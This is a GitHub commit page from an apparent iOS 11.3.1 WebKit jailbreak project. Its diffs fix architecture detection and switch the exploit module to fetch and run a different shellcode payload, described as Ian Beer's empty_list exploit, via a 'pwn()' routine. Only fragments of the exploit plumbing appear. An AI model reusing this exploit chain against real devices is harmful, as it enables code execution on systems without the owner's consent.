Skip to content

Commit

Permalink
Fixed bug in architecture detection
Browse files Browse the repository at this point in the history
  • Loading branch information
MTJailed committed Jul 4, 2018
1 parent 625108d commit 3012ce5
Show file tree
Hide file tree
Showing 3 changed files with 3 additions and 4 deletions.
2 changes: 1 addition & 1 deletion modules/devicesupport.module.js
Original file line number Diff line number Diff line change
Expand Up @@ -348,7 +348,7 @@ var Device = function Device(name, type, productname, osversion, build, browser,
this.Browser = new BrowserSpecs();
this.Localization = new LocaleSpecs();
this.ProductName = productname || detectProductName(this.DeviceType, this.Hardware.screen.width, this.Hardware.screen.height, this.Hardware.graphics.Name);
this.Architecture = DetectArchitecture();
this.Architecture = DetectArchitecture(this.ProductName, this.OSVersion);
this.identifier = Sha1.hash(JSON.stringify(this));
this.toString = function() {
return JSON.stringify(this);
Expand Down
5 changes: 2 additions & 3 deletions modules/sploit.1131.module.js
Original file line number Diff line number Diff line change
Expand Up @@ -424,7 +424,6 @@ var pwn = function() {

if(verbosity >= VERBOSITY.DEFAULT) print('EmptyList is started, please close all background apps then dismiss this alert.');
wrapper.addEventListener('click', function(){}); //execute the shellcode
return true;
};


Expand Down Expand Up @@ -453,7 +452,7 @@ function integrity_checks(buffer) {
function wk113go() {

//retrieve the shellcode containing the empty_list exploit by Ian Beer (Needs some work, doesn't check for request status code)
fetch('payloads/11_3_1/emptylist.bin').then((response) => {
fetch('payloads/11_3_1/emptylist_ACK.bin').then((response) => {
response.arrayBuffer().then((buffer) => {
try{

Expand All @@ -466,7 +465,7 @@ function wk113go() {
integrity_checks(buffer);
u8_buffer.set(new Uint8Array(buffer), 0x4000); //basically the same as what memset() and memcpy would do in c. uint8 is a char array containing our shellcode
if(verbosity === VERBOSITY.HIGH) print('Received '+shellcode_length+ ' bytes of shellcode. Exploit will start now.');
pwn();
return pwn();
} catch(exception) {
alert(exception); //We do not want our script to fail, so we catch all exceptions if they occur and continue
}
Expand Down
Binary file added payloads/11_3_1/emptylist_ACK.bin
Binary file not shown.

0 comments on commit 3012ce5

Please sign in to comment.